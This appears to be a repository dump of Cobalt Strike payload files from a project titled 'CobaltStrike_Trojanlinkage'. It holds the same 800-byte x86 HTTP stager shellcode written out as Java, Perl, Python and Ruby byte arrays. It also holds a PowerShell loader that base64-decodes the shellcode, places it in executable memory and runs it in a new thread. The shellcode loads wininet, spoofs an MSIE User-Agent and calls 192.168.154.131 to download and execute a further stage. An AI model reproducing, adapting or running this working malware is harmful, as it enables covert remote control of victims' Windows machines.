0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 };
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.java
================================================
/* length: 800 bytes */
byte buf[] = new byte[] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x6a, 0x48, 0x75, 0x35, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 };
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.pl
================================================
# length: 800 bytes
$buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x43\x77\x6d\x35\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00";
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.ps1
================================================
Set-StrictMode -Version 2
$eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
$DoIt = @'
$assembly = @"
using System;
using System.Runtime.InteropServices;
namespace inject {
public class func {
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
}
}
"@
$compiler = New-Object Microsoft.CSharp.CSharpCodeProvider
$params = New-Object System.CodeDom.Compiler.CompilerParameters
$params.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
$params.GenerateInMemory = $True
$result = $compiler.CompileAssemblyFromSource($params, $assembly)
[Byte[]]$var_code = [System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWgkBQAAU1BoV4mfxv/V63BbMdJSaAACYIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8vZjhYZgBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpAFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDEwLjA7IFdpbmRvd3MgTlQgNi4yOyBXaW42NDsgeDY0OyBUcmlkZW50LzYuMCkNCgBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYQBo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//MTkyLjE2OC4xNTQuMTMxAAAAAAA=")
$buffer = [inject.func]::VirtualAlloc(0, $var_code.Length + 1, [inject.func+AllocationType]::Reserve -bOr [inject.func+AllocationType]::Commit, [inject.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$buffer) {
$global:result = 3;
return
}
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $buffer, $var_code.Length)
[IntPtr] $thread = [inject.func]::CreateThread(0, 0, $buffer, 0, 0, 0)
if ([Bool]!$thread) {
$global:result = 7;
return
}
$result2 = [inject.func]::WaitForSingleObject($thread, [inject.func+Time]::Infinite)
'@
If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
IEX $DoIt
}
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py
================================================
# length: 800 bytes
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x66\x77\x31\x4e\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00"
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.rb
================================================
# length: 800 bytes
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x75\x43\x50\x54\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00"
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.sct
================================================
<?XML version="1.0"?>
